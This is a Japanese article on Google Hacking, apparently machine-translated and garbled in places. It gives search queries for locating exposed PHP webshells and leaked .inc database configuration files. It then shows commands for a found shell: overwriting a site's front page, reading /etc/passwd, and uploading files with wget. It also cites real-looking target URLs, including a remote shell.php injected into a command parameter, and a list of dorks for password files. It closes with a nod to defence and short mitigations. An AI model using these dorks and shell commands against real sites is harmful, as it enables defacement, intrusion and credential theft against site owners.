Googleを使ってハッカー攻撃の原理を作ります。
技術天地:GoogleHackingはGoogleの検索エンジンを利用して、脆弱性のあるホストと敏感なデータを含む情報を素早く検索します。最近のように、ハッキングが手動で操作する攻撃手段は新しいワームウイルスによって自動的に完成できます。皆さんのGoogleHackingに対する関心と重視を引き起こすために、この文章を編纂しました。Hackに対する攻撃手段の理解を通じて、自分の情報の安全をより良く守りたいです。本稿ではGoogleHacking攻撃手段の理解を重視し、攻撃の詳細については詳述しません。ご了承ください。前書き:2004年ラスベガスで行われたBlackHat大会で、2人の安全専門家がYouと名付けられました。 found that オン google ? googleと atacks のテーマで講演します。安全焦点論壇の原版主WLJ長兄の翻訳整理を経て、個人はいくつかの細部部分を補充して改善する必要があると思います。今日はGoogleのもう一つの機能を紹介します。検索エンジンを使って、脆弱性のあるホストと敏感なデータを含む情報を素早く検索して、直接にバカの侵入をすることもできます。googleで「浸透テスト」を行います。私たちは今日テスト人員を浸透させて攻撃を行う前に、まず情報収集の仕事を行います。ここで私達が今話したいのは、一、googleを使って検索して、誰かにphpをインストールされました。 webshellのバックドアのホスト、そして使用できるかどうかをテストします。二、googleを利用して暴露されたINC敏感情報を検索します。OK、今から始めます。 webshellはgoogleの検索ボックスに記入します。コード: intitle:"php" shell*" "Enbale stder" filetype:php (注: intitle-ホームページのタイトル Enbale stder-UNIX標準出力と標準エラーの略語filetype-ファイルタイプ)。検索結果では、直接にマシンでコマンドを実行するウェブをたくさん見つけることができます。 シェルさんが来ます。見つかったPHPSHELLは利用できません。UNIXに慣れていないなら、直接LISTを見てもいいです。ここでは詳しくは言いません。利用価値がたくさんあります。ここで検索したいくつかの海外のPHPSHELLでは、UNIXコマンドを使用しています。システムが呼び出した関数です。私の測定により、このPHPWEBSHELLは直接Echo(Unix常用命令)である。一言でトップページを終わらせました。コード: echo "召喚します > index.jsp 入手したコード: echo \ 後に「召喚」と書いてください。ホームページを見てください。 "召喚します WGETでファイルをアップロードしてもいいです。そしてexecute Command入力 cat file > index. or echo "" > file echo "test" >> file このように一つの条が打ち出されたら、サイトのトップページが取り替えられます。同じコードでもいいです。 アンム -a;cat /etc/passwd でも、ちょっと注意したいのですが、一部のWEBSHELLのプログラムに問題があり、実行できないものがあります。例えば、http://www.al3toof.com/card/smal ;... c_httml&commmand=http://ramsgaard.net/upload/shell.php ; これらの駅のphpはglobalです。 レジスター オフ 解決策:関連ツールを使ってインターネットで検索できます。もし情報が悪用されたら、http://www.google.com/remove.html ;削除したい情報を提出して、検索エンジンのロボットの検索を制御します。2.INC敏感情報を検索して、googleの検索ボックスに記入します。コード: org.org filetype:inc 私達が今検索しているのはorgドメイン名のサイトのINC情報です。(googleは「COM」の検索情報を遮断しています。他のgov、cn、info、tw、jp、eduなど)PS:多くのPHPプログラマーがプログラミングする時、よく書いているコードや配置情報を一つのファイルに書いています。もちろんこれはいい習慣です。PHP公式サイトを含めて全部そうですが、この中には安全上の問題が含まれていますか? 私はPHPコードを書いていますが、誤った文を書きました。ブラウザでこのPHPファイルを確認したら、私が間違っていたPHPファイルのパスとコード行が詳細に画面に表示されていました。PHPのエラー表示設定は開いています。この機能はPHPではデフォルトです!)つまり、コードを書き間違えないといけないということです。(同じです。incファイルも同じです。) PHPコードの解析で問題が発生した場合、PHPエラー表示がまた開いています。クライアントのユーザは具体的なurlアドレスのincファイルを見ます。urlファイルはtxtテキストのように、ブラウザでブラウズする時、保留なしにその内容を表示しました。また、多くのサイトにいます。incファイルにはユーザパスワードなどの重要な情報が書かれています。国内の有名なハイアール会社と嘉鈴バイク会社を含めて、私が発表したのは私がテストしたからです。http://www.haier.com/su ;***/inc/conn.inc 暴発したデータベースIDのパスワードはクライアントで接続できなくて、サイトは1215を閉じて、ファイアウォールもフィルタリングしました。はい、INCの知識が終わったら、引き続きたくさん検索しました。MYSQLパスワードを暴露した私達はまたクライアントでデータをアップロードして修正できます。ここではデータベースの知識に関してはあまり話しません。INC露出については敏感な情報はここで終わります。もちろん、いくつかの方法で解決できます。 1,ユーザーが直接ソースファイルを取得しないように構成してもいいです。 2,もちろんいい方法は、加えてファイルの拡張子を.php(PHPで解析できる拡張子)に変更することで、クライアントはソースファイルを取得できなくなります。 ここで、FreeMindで描いた絵をテキストで表しました。Googleについて Hackの詳細については、私たちがポイント接続子を分析するのを手伝ってくれます。コード: + - : . * | オペレータ:コード: 「foo 1 foo 2" filetype:123 site:foo.com intext:foo intitle:footitle allinurl:foo パスワード関連コード: :「index of"httpasswd / passwd filetype:xls username password email 「ws_ftp.log" 「config.php」 allinurl:admin mdb サービス filetype:pwd (frontpage) 敏感情報:コード: 「robots.tx」 「disallow:」filetype:txt inurl:_vti_cnf (frontpage files)allinurl:/msadc/samples/selector/showcode.asp allinurl:/examples/jsp/snp/snop/jsp allinurl:phpysinfo ipsec filetype:conf intitle:「error」 occurred" odbc request where (select:「mydomann.com」 ness レポート ゲネナート by「 エンディング:ROOT権限を持つには具体的な問題を分析しなければなりませんが、SHELL権限があればいいです。インターネット上にはWEBSHELLによって権限がアップされる記事がたくさんあります。ご参考ください。googleを通じて、私たちはまた多くの有用なものを検索することができますが、詳細です。情報収集を通じて徐々に分析し、拡大し、侵入します。これらは具体的に分析しません。皆さんに考えを与えて、ゆっくりと検討してください。ここで、この文章はもうすぐ終わります。この文章を書く目的は、皆さんの注目と重視を呼び起こすために、新しいHACKの手段を理解し、新しい防護方法を理解し、物事には両面性があります。今Googleが盛んに行われている時代に、googleを十分に利用すると同時に、より全面的に見るべきです。